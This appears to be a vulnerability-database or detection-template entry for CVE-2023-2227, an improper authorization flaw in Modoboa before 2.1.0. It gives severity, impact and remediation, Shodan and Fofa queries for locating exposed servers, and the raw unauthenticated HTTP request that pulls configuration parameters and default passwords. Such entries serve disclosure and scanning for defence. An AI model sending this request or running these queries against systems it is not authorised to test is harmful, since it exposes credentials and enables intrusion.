| Title | Modoboa < 2.1.0 - Improper Authorization |
|---|---|
| Author | ritikchaddha,princechaddha |
| Severity | Critical |
| Impact | Unauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system. |
| Remediation | Update Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint. |
| CVSS Score | 9.1 |
| EPSS Score | 0.90923 |
| CVE ID | CVE-2023-2227 |
| CWE ID | CWE-285 |
| Shodan Query | http.favicon.hash:1949005079http.html:"modoboa" |
| Fofa Query | body="Modoboa"body="modoboa"icon_hash=1949005079 |
| Tags | cve cve2023 modoboa exposure disclosure vuln |
Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
GET /api/v2/parameters/core/ HTTP/1.1
Host: www.victim.com
User-Agent: 7h3h4ckv157
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2227.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-2227.pcap
N/AN/A